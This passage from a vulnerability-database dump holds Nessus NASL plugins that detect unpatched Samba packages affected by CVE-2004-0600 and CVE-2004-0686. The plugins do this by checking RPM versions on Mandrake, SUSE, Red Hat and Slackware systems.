(CVE-2004-0600)\n\nA buffer overrun has been located in the code used to support the\n'mangling method = hash' smb.conf option. Please be aware that the\ndefault setting for this parameter is 'mangling method = hash2' and\ntherefore not vulnerable. This bug is present in Samba 3.0.0 and\nlater, as well as Samba 2.2.X (CVE-2004-0686)\n\nThis update also fixes a bug where attempting to print in some cases\nwould cause smbd to exit with a signal 11.", "edition": 25, "published": "2004-07-31T00:00:00", "title": "Mandrake Linux Security Advisory : samba (MDKSA-2004:071)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0686", "CVE-2004-0600"], "modified": "2004-07-31T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:libsmbclient0-devel", "p-cpe:/a:mandriva:linux:samba-passdb-xml", "cpe:/o:mandrakesoft:mandrake_linux:9.1", "p-cpe:/a:mandriva:linux:samba-doc", "cpe:/o:mandrakesoft:mandrake_linux:10.0", "p-cpe:/a:mandriva:linux:nss_wins", "p-cpe:/a:mandriva:linux:libsmbclient0-static-devel", "cpe:/o:mandrakesoft:mandrake_linux:9.2", "p-cpe:/a:mandriva:linux:samba-common", "p-cpe:/a:mandriva:linux:samba-swat", "p-cpe:/a:mandriva:linux:samba-passdb-mysql", "p-cpe:/a:mandriva:linux:samba-client", "p-cpe:/a:mandriva:linux:samba-server", "p-cpe:/a:mandriva:linux:samba-winbind", "p-cpe:/a:mandriva:linux:libsmbclient0", "p-cpe:/a:mandriva:linux:samba-debug"], "id": "MANDRAKE_MDKSA-2004-071.NASL", "href": "https://www.tenable.com/plugins/nessus/14170", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2004:071. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14170);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2004-0600\", \"CVE-2004-0686\");\n script_xref(name:\"MDKSA\", value:\"2004:071\");\n\n script_name(english:\"Mandrake Linux Security Advisory : samba (MDKSA-2004:071)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability was discovered in SWAT, the Samba Web Administration\nTool. The routine used to decode the base64 data during HTTP basic\nauthentication is subject to a buffer overrun caused by an invalid\nbase64 character. This same code is also used to internally decode the\nsambaMungedDial attribute value when using the ldapsam passdb backend,\nand to decode input given to the ntlm_auth tool.\n\nThis vulnerability only exists in Samba versions 3.0.2 or later; the\n3.0.5 release fixes the vulnerability. Systems using SWAT, the ldapsam\npassdb backend, and tose running winbindd and allowing third- party\napplications to issue authentication requests via ntlm_auth tool\nshould upgrade immediately. (CVE-2004-0600)\n\nA buffer overrun has been located in the code used to support the\n'mangling method = hash' smb.conf option. Please be aware that the\ndefault setting for this parameter is 'mangling method = hash2' and\ntherefore not vulnerable. This bug is present in Samba 3.0.0 and\nlater, as well as Samba 2.2.X (CVE-2004-0686)\n\nThis update also fixes a bug where attempting to print in some cases\nwould cause smbd to exit with a signal 11.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libsmbclient0-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libsmbclient0-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:nss_wins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-passdb-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-passdb-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK10.0\", cpu:\"i386\", reference:\"libsmbclient0-3.0.2a-3.2.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", cpu:\"i386\", reference:\"libsmbclient0-devel-3.0.2a-3.2.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", cpu:\"i386\", reference:\"libsmbclient0-static-devel-3.0.2a-3.2.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"nss_wins-3.0.2a-3.2.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"samba-client-3.0.2a-3.2.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"samba-common-3.0.2a-3.2.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"samba-doc-3.0.2a-3.2.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"samba-passdb-mysql-3.0.2a-3.2.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"samba-passdb-xml-3.0.2a-3.2.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"samba-server-3.0.2a-3.2.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"samba-swat-3.0.2a-3.2.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"samba-winbind-3.0.2a-3.2.100mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"nss_wins-2.2.7a-9.4.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"samba-client-2.2.7a-9.4.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"samba-common-2.2.7a-9.4.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"samba-doc-2.2.7a-9.4.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"samba-server-2.2.7a-9.4.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"samba-swat-2.2.7a-9.4.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"samba-winbind-2.2.7a-9.4.91mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.2\", cpu:\"i386\", reference:\"libsmbclient0-2.2.8a-13.2.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"i386\", reference:\"libsmbclient0-devel-2.2.8a-13.2.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"i386\", reference:\"libsmbclient0-static-devel-2.2.8a-13.2.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"nss_wins-2.2.8a-13.2.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"samba-client-2.2.8a-13.2.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"samba-common-2.2.8a-13.2.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"samba-debug-2.2.8a-13.2.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"samba-doc-2.2.8a-13.2.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"samba-server-2.2.8a-13.2.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"samba-swat-2.2.8a-13.2.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"samba-winbind-2.2.8a-13.2.92mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:14:43", "description": "The remote host is missing the patch for the advisory SUSE-SA:2004:022 (samba).\n\n\nThe Samba Web Administration Tool (SWAT) was found vulnerable to\na buffer overflow in its base64 code. This buffer overflow can possibly\nbe exploited remotely before any authentication took place to execute\narbitrary code.\nThe same piece of vulnerable code was also used in ldapsam passdb and\nin the ntlm_auth tool.\nThis vulnerability only exists on Samba 3.0.2 to 3.0.4.\n\nAnother buffer overflow was found in Samba 3.0.0 and later, as well as\nin Samba 2.2.x. This overflow exists in the hash code of the mangling\nmethod (smb.conf: mangling method = hash), the default uses hash2 which\nis not vulnerable.\n\nThere is no temporary workaround known. The first proof-of-concept\nexploits were seen on public mailing lists.\n\nAfter the installation was successfully completed please restart the\nsamba daemon.\n/usr/sbin/rcsmb restart\n\nSWAT is called by inetd/xinetd. Therefore it is sufficient to kill all\nrunning instances of SWAT only.\n\nPlease download the update package for your distribution and verify its\nintegrity by the methods listed in section 3) of this announcement.\nThen, install the package using the command 'rpm -Fhv file.rpm' to apply\nthe update.", "edition": 23, "published": "2004-07-25T00:00:00", "title": "SUSE-SA:2004:022: samba", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0686", "CVE-2004-0600"], "modified": "2004-07-25T00:00:00", "cpe": [], "id": "SUSE_SA_2004_022.NASL", "href": "https://www.tenable.com/plugins/nessus/13838", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# This plugin text was extracted from SuSE Security Advisory SUSE-SA:2004:022\n#\n\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif(description)\n{\n script_id(13838);\n script_bugtraq_id(10780);\n script_version(\"1.16\");\n script_cve_id(\"CVE-2004-0600\", \"CVE-2004-0686\");\n \n name[\"english\"] = \"SUSE-SA:2004:022: samba\";\n \n script_name(english:name[\"english\"]);\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a vendor-supplied security patch\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing the patch for the advisory SUSE-SA:2004:022 (samba).\n\n\nThe Samba Web Administration Tool (SWAT) was found vulnerable to\na buffer overflow in its base64 code. This buffer overflow can possibly\nbe exploited remotely before any authentication took place to execute\narbitrary code.\nThe same piece of vulnerable code was also used in ldapsam passdb and\nin the ntlm_auth tool.\nThis vulnerability only exists on Samba 3.0.2 to 3.0.4.\n\nAnother buffer overflow was found in Samba 3.0.0 and later, as well as\nin Samba 2.2.x. This overflow exists in the hash code of the mangling\nmethod (smb.conf: mangling method = hash), the default uses hash2 which\nis not vulnerable.\n\nThere is no temporary workaround known. The first proof-of-concept\nexploits were seen on public mailing lists.\n\nAfter the installation was successfully completed please restart the\nsamba daemon.\n/usr/sbin/rcsmb restart\n\nSWAT is called by inetd/xinetd. Therefore it is sufficient to kill all\nrunning instances of SWAT only.\n\nPlease download the update package for your distribution and verify its\nintegrity by the methods listed in section 3) of this announcement.\nThen, install the package using the command 'rpm -Fhv file.rpm' to apply\nthe update.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"http://www.suse.de/security/2004_22_samba.html\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n\n\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/07/25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n script_end_attributes();\n\n \n summary[\"english\"] = \"Check for the version of the samba package\";\n script_summary(english:summary[\"english\"]);\n \n script_category(ACT_GATHER_INFO);\n \n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n family[\"english\"] = \"SuSE Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/SuSE/rpm-list\");\n exit(0);\n}\n\ninclude(\"rpm.inc\");\nif ( rpm_check( reference:\"samba-2.2.8a-218\", release:\"SUSE8.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"samba-client-2.2.8a-218\", release:\"SUSE8.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"samba-vscan-0.3.2a-271\", release:\"SUSE8.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"samba-2.2.8a-220\", release:\"SUSE8.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"samba-client-2.2.8a-220\", release:\"SUSE8.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"samba-vscan-0.3.2a-273\", release:\"SUSE8.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"samba-doc-2.2.8a-220\", release:\"SUSE8.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"libsmbclient-2.2.8a-220\", release:\"SUSE8.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"libsmbclient-devel-2.2.8a-220\", release:\"SUSE8.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"samba-2.2.8a-220\", release:\"SUSE9.0\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"samba-client-2.2.8a-220\", release:\"SUSE9.0\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"libsmbclient-2.2.8a-220\", release:\"SUSE9.0\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"libsmbclient-devel-2.2.8a-220\", release:\"SUSE9.0\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"samba-3.0.4-1.27\", release:\"SUSE9.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"samba-client-3.0.4-1.27\", release:\"SUSE9.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"samba-pdb-3.0.4-1.27\", release:\"SUSE9.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"samba-python-3.0.4-1.27\", release:\"SUSE9.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"samba-vscan-0.3.4-83.30\", release:\"SUSE9.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"samba-winbind-3.0.4-1.27\", release:\"SUSE9.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"samba-doc-3.0.4-1.12\", release:\"SUSE9.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"libsmbclient-3.0.4-1.27\", release:\"SUSE9.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"libsmbclient-devel-3.0.4-1.27\", release:\"SUSE9.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif (rpm_exists(rpm:\"samba-\", release:\"SUSE8.1\")\n || rpm_exists(rpm:\"samba-\", release:\"SUSE8.2\")\n || rpm_exists(rpm:\"samba-\", release:\"SUSE9.0\")\n || rpm_exists(rpm:\"samba-\", release:\"SUSE9.1\") )\n{\n set_kb_item(name:\"CVE-2004-0600\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0686\", value:TRUE);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:05:19", "description": "Updated samba packages that fix buffer overflows, as well as other\nvarious bugs, are now available.\n\nSamba provides file and printer sharing services to SMB/CIFS clients.\n\nEvgeny Demidov discovered a flaw in the internal routine used by the\nSamba Web Administration Tool (SWAT) in Samba versions 3.0.2 through\n3.0.4. When decoding base-64 data during HTTP basic authentication, an\ninvalid base-64 character could cause a buffer overflow. If the SWAT\nadministration service is enabled, this flaw could allow an attacker\nto execute arbitrary code. The Common Vulnerabilities and Exposures\nproject (cve.mitre.org) has assigned the name CVE-2004-0600 to this\nissue.\n\nAdditionally, the Samba team discovered a buffer overflow in the code\nused to support the 'mangling method = hash' smb.conf option. Please\nbe aware that the default setting for this parameter is 'mangling\nmethod = hash2' and therefore not vulnerable. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the\nname CVE-2004-0686 to this issue.\n\nThis release includes the updated upstream version 3.0.4 together with\nbackported security patches to correct these issues as well as a\nnumber of post-3.0.4 bug fixes from the Samba subversion repository.\n\nThe most important bug fix allows Samba users to change their\npasswords if Microsoft patch KB 828741 (a critical update) had been\napplied.\n\nAll users of Samba should upgrade to these updated packages, which\nresolve these issues.", "edition": 28, "published": "2004-07-22T00:00:00", "title": "RHEL 3 : samba (RHSA-2004:259)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0686", "CVE-2004-0600"], "modified": "2004-07-22T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:3", "p-cpe:/a:redhat:enterprise_linux:samba", "p-cpe:/a:redhat:enterprise_linux:samba-common", "p-cpe:/a:redhat:enterprise_linux:samba-client", "p-cpe:/a:redhat:enterprise_linux:samba-swat"], "id": "REDHAT-RHSA-2004-259.NASL", "href": "https://www.tenable.com/plugins/nessus/13658", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2004:259. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(13658);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2004-0600\", \"CVE-2004-0686\");\n script_xref(name:\"RHSA\", value:\"2004:259\");\n\n script_name(english:\"RHEL 3 : samba (RHSA-2004:259)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated samba packages that fix buffer overflows, as well as other\nvarious bugs, are now available.\n\nSamba provides file and printer sharing services to SMB/CIFS clients.\n\nEvgeny Demidov discovered a flaw in the internal routine used by the\nSamba Web Administration Tool (SWAT) in Samba versions 3.0.2 through\n3.0.4. When decoding base-64 data during HTTP basic authentication, an\ninvalid base-64 character could cause a buffer overflow. If the SWAT\nadministration service is enabled, this flaw could allow an attacker\nto execute arbitrary code. The Common Vulnerabilities and Exposures\nproject (cve.mitre.org) has assigned the name CVE-2004-0600 to this\nissue.\n\nAdditionally, the Samba team discovered a buffer overflow in the code\nused to support the 'mangling method = hash' smb.conf option. Please\nbe aware that the default setting for this parameter is 'mangling\nmethod = hash2' and therefore not vulnerable. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the\nname CVE-2004-0686 to this issue.\n\nThis release includes the updated upstream version 3.0.4 together with\nbackported security patches to correct these issues as well as a\nnumber of post-3.0.4 bug fixes from the Samba subversion repository.\n\nThe most important bug fix allows Samba users to change their\npasswords if Microsoft patch KB 828741 (a critical update) had been\napplied.\n\nAll users of Samba should upgrade to these updated packages, which\nresolve these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2004-0600\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2004-0686\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2004:259\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/07/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^3([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 3.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2004:259\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL3\", reference:\"samba-3.0.4-6.3E\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"samba-client-3.0.4-6.3E\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"samba-common-3.0.4-6.3E\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"samba-swat-3.0.4-6.3E\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba / samba-client / samba-common / samba-swat\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T09:10:15", "description": "New samba packages are available for Slackware 8.1, 9.0, 9.1, 10.0\nand -current to fix security issues.", "edition": 23, "published": "2005-07-13T00:00:00", "title": "Slackware 10.0 / 8.1 / 9.0 / 9.1 / current : new samba packages (SSA:2004-207-01)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0686", "CVE-2004-0600"], "modified": "2005-07-13T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:8.1", "cpe:/o:slackware:slackware_linux:9.0", "cpe:/o:slackware:slackware_linux:9.1", "cpe:/o:slackware:slackware_linux:10.0", "cpe:/o:slackware:slackware_linux", "p-cpe:/a:slackware:slackware_linux:samba"], "id": "SLACKWARE_SSA_2004-207-01.NASL", "href": "https://www.tenable.com/plugins/nessus/18774", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2004-207-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(18774);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2004-0600\", \"CVE-2004-0686\");\n script_xref(name:\"SSA\", value:\"2004-207-01\");\n\n script_name(english:\"Slackware 10.0 / 8.1 / 9.0 / 9.1 / current : new samba packages (SSA:2004-207-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New samba packages are available for Slackware 8.1, 9.0, 9.1, 10.0\nand -current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.407946\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8156733a\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected samba package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:9.0\");\n 